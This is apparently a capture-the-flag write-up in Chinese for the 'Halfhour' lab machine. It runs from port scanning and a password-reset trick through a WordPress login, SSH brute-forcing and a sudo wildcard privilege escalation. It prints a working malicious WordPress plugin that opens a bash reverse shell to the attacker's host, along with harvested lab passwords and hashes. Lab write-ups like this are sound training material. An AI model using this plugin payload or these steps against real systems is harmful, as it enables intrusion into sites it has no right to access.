Halfhour靶机-Maze-通配符漏洞 #
信息收集 #
NMAP扫描端口
└─# nmap 172.20.10.2 -sT -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-18 01:16 EDT
Nmap scan report for halfhour.dsz (172.20.10.2)
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
1338/tcp open wmc-log-svc
MAC Address: 08:00:27:B7:2B:50 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
nc访问1337 和 1338端口试试 得到了一个密码bobobo
─# nc 172.20.10.2 1337
Please enter password: root
Incorrect password. Attempts left: 2
123
Incorrect password. Attempts left: 1
123
Too many failed attempts. Reset password? (yes/no)yes
Please send new password to port 1338.
┌──(root㉿kali)-[~/pspy]
└─# nc 172.20.10.2 1338
Please send new password: 123
Congratulations! Password reset successful!
Old password: bobobo
访问80右键得到了一个域名放到hosts打开发现一个wordpress网站
<!-- halfhour.dsz -->
这里信息收集或者你用WPSCAN扫描 得到一个用户todd 但是用wpscan扫描爆破出不来 发现使用1338的密码成功登录后台然后就是上传插件反弹shell
放到一个压缩包中上传插件点击启动即可反弹shell
<?php
/**
* Plugin Name: WonderfulWebshell
* Plugin URI: https://github.com/jckhmr/wonderfullwebshell
* Description: Wordpress webshell used for demo purposes only
* Version: 1.0
* Author: jckhmr
* Author URI: https://jckhmr.net
* License: https://nosuchlicense
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.20.10.11/8888 0>&1'");
?>
获得WWW权限 #
└─# nc -lvvp 8888
listening on [any] 8888 ...
connect to [172.20.10.11] from halfhour.dsz [172.20.10.2] 44354
bash: cannot set terminal process group (471): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Halfhour:/var/www/halfhour.dsz/wp-admin$
信息收集查看数据配置文件发现密码root123 和数据库密码 和 三个用户 我们使用密码来爆破
define( 'DB_USER', 'wpuser' );
/** Database password */
/* define( 'DB_PASSWORD', 'root123' ); */
define( 'DB_PASSWORD', 'your_strong_password' );
www-data@Halfhour:/var/www/halfhour.dsz$ ls /home
ls /home
nxal
wangjiang
welcome
爆破 不知道为什么放了nxal爆破wangjiang密码一直错的删除了对了
[22][ssh] host: 172.20.10.2 login: wangjiang password: root123
[22][ssh] host: 172.20.10.2 login: nxal password: nxal
登录wangjiang 拿到USER.TXT
wangjiang@Halfhour:~$ cat user.txt
flag{user-4c850c5b3b2756eXXXXXX
发现提示登录welcome用户这里发现一个MD5 4c850c5b3b2756e67a91bad8e046ddac 解密aaaaa但是登录不上啊,但是直接用可以登录..
wangjiang@Halfhour:~$ cat note.txt
Get user welcome first
wangjiang@Halfhour:~$
wangjiang@Halfhour:~$ cat .mysql_history
_HiStOrY_V2_
CREATE\040DATABASE\040wordpress;
CREATE\040USER\040'wpuser'@'localhost'\040IDENTIFIED\040BY\040'your_strong_password';
GRANT\040ALL\040PRIVILEGES\040ON\040wordpress.*\040TO\040'wpuser'@'localhost';
FLUSH\040PRIVILEGES;
EXIT;
create\040database\040xxoo
;
use\040xxoo
show\040tables
;
CREATE\040TABLE\040IF\040NOT\040EXISTS\040user\040(
\040\040\040\040id\040INT\040AUTO_INCREMENT\040PRIMARY\040KEY,
\040\040\040\040username\040VARCHAR(50)\040NOT\040NULL\040UNIQUE,
\040\040\040\040password\040CHAR(32)\040NOT\040NULL\040COMMENT\040'MD5',
\040\040\040\040created_at\040TIMESTAMP\040DEFAULT\040CURRENT_TIMESTAMP
)\040ENGINE=InnoDB\040DEFAULT\040CHARSET=utf8mb4;
CREATE\040TABLE\040IF\040NOT\040EXISTS\040user\040(\040\040\040\040\040id\040INT\040AUTO_INCREMENT\040PRIMARY\040KEY,\040\040\040\040\040username\040VARCHAR(50)\040NOT\040NULL\040UNIQUE,\040\040\040\040\040password\040CHAR(32)\040NOT\040NULL\040COMMENT\040'MD5',\040\040\040\040\040created_at\040TIMESTAMP\040DEFAULT\040CURRENT_TIMESTAMP\040)\040ENGINE=InnoDB\040DEFAULT\040CHARSET=utf8mb4;
INSERT\040INTO\040user\040(username,\040password)\040
VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')
ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password);
INSERT\040INTO\040user\040(username,\040password)\040\040VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')\040ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password);
show\040tables;
select\040*\040from\040users;
select\040*\040from\040user;
show\040tables;
show\040databases;
wangjiang@Halfhour:~$
ROOT #
这里发现可以用这个del文件
User welcome may run the following commands on Halfhour:
(ALL) NOPASSWD: /usr/local/bin/del.sh
welcome@Halfhour:/home/wangjiang$ cat /usr/local/bin/del.sh
#!/bin/bash
PATH=/usr/bin
cd /tmp
cat /root/root.txt | tr -d [A-Za-z0-9]
方法1 通配符问题 这里通配符没有加入引号
比如你在tmp创建文件A 他就会匹配A 就变为 tr -d A 只会替换A的如果加了引号 “加引号” 是为了明确告诉 Shell:参数是纯字符串,不要对其进行通配符匹配、变量替换等解析操作
root@Halfhour:/home/wangjiang# cd /tmp
root@Halfhour:/tmp# touch A
root@Halfhour:/tmp# sudo /usr/local/bin/del.sh
flag{root-4c850c5b3b2756e67a91bad8e046ddac}
root@Halfhour:/tmp#
root@Halfhour:/tmp#
方法2 直接用前面bobobo密码登录
welcome@Halfhour:/home/wangjiang$ su root
Password:
root@Halfhour:/home/wangjiang# whoami
root